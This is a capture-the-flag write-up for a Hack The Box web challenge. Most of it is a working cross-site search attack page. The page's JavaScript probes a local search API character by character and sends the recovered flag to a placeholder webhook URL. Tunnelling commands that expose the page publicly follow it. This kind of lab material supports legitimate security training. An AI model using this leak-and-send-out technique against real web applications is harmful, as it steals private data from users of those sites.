https://app.hackthebox.com/challenges/260

Description

We discovered a mysterious web portal that we believe are operated by aliens! Can you find out what they don’t want us to see?

Exploitation

Use a webhook service like https://app.interactsh.com/, a VPS with a public port, or a tunneling service to expose the service.

index.html

<html>
<head></head>
<body>
<script type="text/javascript">
    flag_charset = "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_}";
    var flag = "HTB{";
    var charIndex = 0;
    const bruteForce = () => {
        var script = document.createElement("script");
        script.src = `//127.0.0.1:1337/api/entries/search?q=${flag}${flag_charset.charAt(charIndex)}`;
        document.body.appendChild(script);
        script.onload = () => {
            flag += flag_charset.charAt(charIndex);
            charIndex = 0;
            script.parentNode.removeChild(script);
            if (flag.slice(-1) != '}') {
                bruteForce();
            } else {
                img = new Image();
                img.src = 'https://webhook.com?flag=' + flag; // <-- WebHookUrl
            }
        };
        script.onerror = () => {
            script.parentNode.removeChild(script);
            charIndex += 1;
            bruteForce();
        };
    };
    bruteForce();
</script>
</body>
</html>

python -m http.server

ssh -R 80:localhost:8000 localhost.run

Send the tunnel HTTP URL in the Abusive Content URL and check your webhook.

Summary

AbuseHumanDB: identify the broken request handling, prove control, and use it to recover the flag.